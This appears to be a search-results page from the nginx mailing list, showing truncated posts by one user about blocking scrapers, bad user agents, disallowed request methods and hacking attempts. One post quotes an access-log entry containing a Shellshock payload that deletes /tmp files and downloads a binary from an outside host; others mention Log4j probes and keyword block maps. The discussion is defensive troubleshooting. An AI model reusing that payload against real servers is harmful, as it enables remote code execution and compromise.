I am presently using a scheme like this to prevent scraping documents.
location /images/ {
valid_referers none blocked www.example.com example.com
forums.othersite.com ;
# you can tell the browser that it can only download content from the
On Mon, 20 Jun 2022 17:23:23 -0400
"_lukman_" wrote:
> server
> {
>listen 443 default_server ssl;
>listen [::]:443 ssl http2;
>server_name dummysite.io www.dummysite.io;
>ssl_certificate /etc/letsencrypt/live/dummysite.io/fullchain.pem; #
> managed by Certbot
>
ry to
> interpolate these, and thus be vulnerable to the exploit.
>
> On Mon, 20 Dec 2021 at 04:02, li...@lazygranch.com
> wrote:
>
> > I don't have any service using java so I don't believe I am subject
> > to this exploit. Howerver I am confused why a returned a 200 for
>
I don't have any service using java so I don't believe I am subject to
this exploit. Howerver I am confused why a returned a 200 for this
request. The special characters in the URL are confusing.
200 207.244.245.138 - - [17/Dec/2021:02:58:02 +] "GET / HTTP/1.1" 706
I insist on encryption so this is what I use:
server {
listen 80;
server_name yourdomain.com www.yourdomain.com ;
if ($request_method !~ ^(GET|HEAD)$ ) {
return 444;
}
return 301 https://$host$request_uri;
}
I only serve static pages so I use
Answers intermixed below.
On Wed, 11 Mar 2020 21:23:15 -0400
"MAXMAXarena" wrote:
> Hello @Ralph Seichter,
> what do you mean by "mutually exclusive"?
> As for the tools I mentioned, it was just an example.
> Are you telling me I can't solve this problem?
>
>
> Hello @garic,
> thanks for this
On Fri, 08 Mar 2019 10:42:28 -0500
"wkbrad" wrote:
> Thanks for that info. It's definitely harder to notice the issue on
> small servers like that. But you are still seeing about a 50%
> increase in ram usage there by your own tests.
>
> The smallest server I've tested this on uses about 20M
On Thu, 07 Mar 2019 13:33:39 -0500
"wkbrad" wrote:
> Hi all,
>
> I just wanted to share the details of what I've found about this
> issue. Also thanks to Maxim Dounin and Reinis Rozitis who gave some
> really great answers!
>
> The more I look into this the more I'm convinced this is an issue
On Thu, 10 Jan 2019 08:50:33 +
Francis Daly wrote:
> On Wed, Jan 09, 2019 at 06:14:04PM -0800, li...@lazygranch.com wrote:
>
> Hi there,
>
> > location / {
> > if ($badagent) { return 403; }
> > }
> > location = /feeds {
>
On Wed, 9 Jan 2019 08:20:05 +
Francis Daly wrote:
> On Tue, Jan 08, 2019 at 07:30:44PM -0800, li...@lazygranch.com wrote:
>
> Hi there,
>
> > Stripping down the nginx.conf file:
> >
> > server{
> > location / {
> > root
I have a map to check for bad user agents called badagent. I want to
set up a RSS feed. The feedreaders can have funny agents, so I need to
omit the bad agent check if the file is any xml type.
This is rejected.
if (($request_uri != [*.xml]) && ($badagent)) {return 444; }
Suggestions?
The centos nginx from the repo lacks ngx_http_hls_module. This is a
technique to add the module without compilation.
https://dzhorov.com/2017/04/compiling-dynamic-modules-into-nginx-centos-7
Does anyone have experience with this? I'd like to avoid building nginx
from scratch to make the updates
On Tue, 20 Mar 2018 13:03:09 +
"Friscia, Michael" wrote:
> This is great, thank you again, this is a huge jumpstart!
Per NIST best practices, you should limit the HTML verbs that you
allow. A very simple website can run on just GET and HEAD. Here is how
you 444
On Mon, 19 Mar 2018 12:31:20 +
"Friscia, Michael" wrote:
> Just a thought before I start crafting one. I am creating a
> location{} block with the intention of populating it with a ton of
> requests I want to terminate immediately with a 444 response. Before
> I
I had a few neurons fire. I forgot nginx can load dynamic modules.
https://www.nginx.com/blog/nginx-dynamic-modules-how-they-work/
I haven't done this myself, so you are on your own at this point.
On Fri, 09 Mar 2018 11:59:30 -0500
"neuronetv" wrote:
> I've
On Fri, 23 Feb 2018 18:54:48 -0800
"li...@lazygranch.com" <li...@lazygranch.com> wrote:
> On Thu, 22 Feb 2018 18:40:12 -0800
> "li...@lazygranch.com" <li...@lazygranch.com> wrote:
>
> > When I was using FreeBSD, the access log was real time
Presently I'm putting maps in the server location. Can they be put in
the very top to make them work for all servers? If not, I can just make
the maps into include files and insert as needed, but maybe making the
map global is more efficient.
___
nginx
<aroz...@nginx.com> wrote:
> Hi,
>
> have you checked this with disabled selinux ?
>
> br,
> Aziz.
>
>
>
>
>
> > On 20 Dec 2017, at 11:07, li...@lazygranch.com wrote:
> >
> > I'm setting up a web server on a Centos 7 VPS. I'm relat
I'm setting up a web server on a Centos 7 VPS. I'm relatively sure I
have the firewalls set up properly since I can see my browser requests
in the access and error log. That said, I have file permission problem.
nginx 1.12.2
Linux servername 3.10.0-693.5.2.el7.x86_64 #1 SMP Fri Oct 20 20:32:50
Here is a log of real life IP limiting with a 30 connection limit:
86.184.152.14 British Telecommunications PLC
8.37.235.199 Level 3 Communications Inc.
130.76.186.14 The Boeing Company
security.5.bz2:Nov 29 20:50:53 theranch kernel: ipfw: 5005 drop session type 40
86.184.152.14 58714 -> myip
I'm curious why this request got a 400 response rather than a 404.
400 123.160.235.162 - - [16/Jul/2017:22:56:30 +] "GET /currentsetting.htm
HTTP/1.1" 173 "-" "-" "-"
log_format main '$status $remote_addr - $remote_user [$time_local] "$request"
'
'$body_bytes_sent
On Thu, 13 Jul 2017 23:46:12 +0100
Francis Daly wrote:
> On Thu, Jul 13, 2017 at 09:37:08AM -0400, Viaduct Lists wrote:
>
> Hi there,
>
> > [Wed Jul 12 06:08:41 rich@neb /var/log/nginx] nginx -t
>
> If you were running this command as "root", would that prompt say
>
I'm sending 403 responses now, so I screwed up by mistaking the fields
in the logs. I'm going back to lurking mode again with my tail
shamefully between my legs.
This code in the image location section will block the google app:
if ($http_user_agent ~*
Actually I think I was mistaken and the field is the user agent. I will
change the variable and see what happens. I did some experiments to
show the pattern match works.
On Tue, 20 Jun 2017 20:56:46 -0700
li...@lazygranch.com wrote:
> I want to block by referrer. I provided a more &quo
On Tue, 20 Jun 2017 17:49:14 -0700
Robert Paprocki <rpapro...@fearnothingproductions.net> wrote:
> Do you mean $http_user_agent?
>
> > On Jun 20, 2017, at 17:36, "li...@lazygranch.com"
> > <li...@lazygranch.com> wrote:
> >
> > I would
I would like to block the google app from directly downloading images.
access.log:
200 186.155.157.9 - - [20/Jun/2017:00:35:47 +] "GET /images/photo.jpg
HTTP/1.1" 334052 "-" "com.google.GoogleMobile/28.0.0 iPad/9.3.5 hw/iPad2_5" "-"
My nginx code in the images location:
if
Here is the map. I truncated my bad agent list, but will get you
started. I used the user agent changer in Chromium to make sure it
worked. -
map $http_user_agent $badagent {
default0;
~*WordPress
A bit OT, but can a guru verify I rejected all these proxy attempts.
I'm 99.9% sure, but I'd hate to allow some spammer or worse to route
through my server. The only edit I made is when they ran my IP address
though a forum spam checker. (I assume google indexes pastebin.)
I keep my nginx server set up dumb. (Don't need anything fancy at the
moment). Is this request below possibly valid? I flag anything with a
question mark in it as hacking, but maybe IOS makes some requests that
some websites will process, and others would just ignore after the
question mark.
444
I only serve static pages, hence I have this in my conf file:
---
## Only allow these request methods ##
if ($request_method !~ ^(GET|HEAD)$ ) {
return 444;
}
Shouldn't the return code be 444 instead of 400?
On Sat, 22 Oct 2016 17:40:56 -0400
"itpp2012" wrote:
> The idea is nice but pointless, if you maintain this list over 6
> months you most likely will end up blocking just about everyone.
>
> Stick to common sense with your config, lock down nginx and the
> backends,
http://pastebin.com/7W0uDrLa
If you need an extensive list of hacker requests (over 200), I put this
log entry on pastebin. As mentioned at the top of the pastebin, the
hacker used my IP address directly rather than my doman name.
I have a "map" that detects typical hacker activity. Perhaps in
http://pastebin.com/tZZg3RbA/?e=1
This is the access.log file data relevant to that fake googlebot. It
starts with a fake googlebot entry, then goes downhill from there. I
rate limit at 10/s. I only allow the verbs HEAD and GET, so the POST
went to 444 directly.
I replaced the domain with a fake
I got a spoofed googlebot hit. It was easy to detect since there were
probably a hundred requests that triggered my hacker detection map
scheme. Only two requests received a 200 return and both were harmless.
200 118.193.176.53 - - [25/Sep/2016:17:45:23 +] "GET / HTTP/1.1" 847 "-"
should try to duplicate this in the event it has something
to do with my setup.
On Mon, 12 Sep 2016 15:30:01 -0700
li...@lazygranch.com wrote:
> Most of the chatter on the interwebs believes that the rate limit is
> per connection, so if some IP opens up multiple connections, they get
Link goes to conf file
https://www.dropbox.com/s/1gz5139s4q3b7e0/nginx.conf?dl=0
On Tue, 23 Aug 2016 20:51:55 +0300
"Reinis Rozitis" wrote:
> > Configuration file included in the post. I already checked it.
>
> You have shown only few excerpts (like there might be other
>
Nginx 1.10.1,2
FreeBSD 10.2-RELEASE-p18 #0: Sat May 28 08:53:43 UTC 2016
I'm using the "map" module to detect obvious hacking by detecting
keywords. (Yes, I know about Naxsi.) Finding the really dumb hacks is
easy. I give them a 444 return code with the idea being I can run a
script on the log
On Sat, 30 Jul 2016 23:49:30 +0300
"Valentin V. Bartenev" <vb...@nginx.com> wrote:
> On Saturday 30 July 2016 10:52:46 li...@lazygranch.com wrote:
> > On Sat, 30 Jul 2016 13:18:47 +0300
> > "Valentin V. Bartenev" <vb...@nginx.com> wrote
I see a return code of 200. Does that mean this script was executed?
-
219.153.48.45 - - [30/Jul/2016:07:40:07 +] "GET / HTTP/1.1" 200 643
"() { :; }; /bin/bash -c \x22rm -rf /tmp/*;ech o wget
http://houmen.linux22.cn:123/houmen/linux223 -O /tmp/China.Z-slma
>> /tmp/Run.sh;echo
On Sat, 30 Jul 2016 13:18:47 +0300
"Valentin V. Bartenev" <vb...@nginx.com> wrote:
> On Friday 29 July 2016 23:01:05 li...@lazygranch.com wrote:
> > I see a fair amount of hacking attempts in the access.log. That is,
> > they
> show up with a return
40 matches
Mail list logo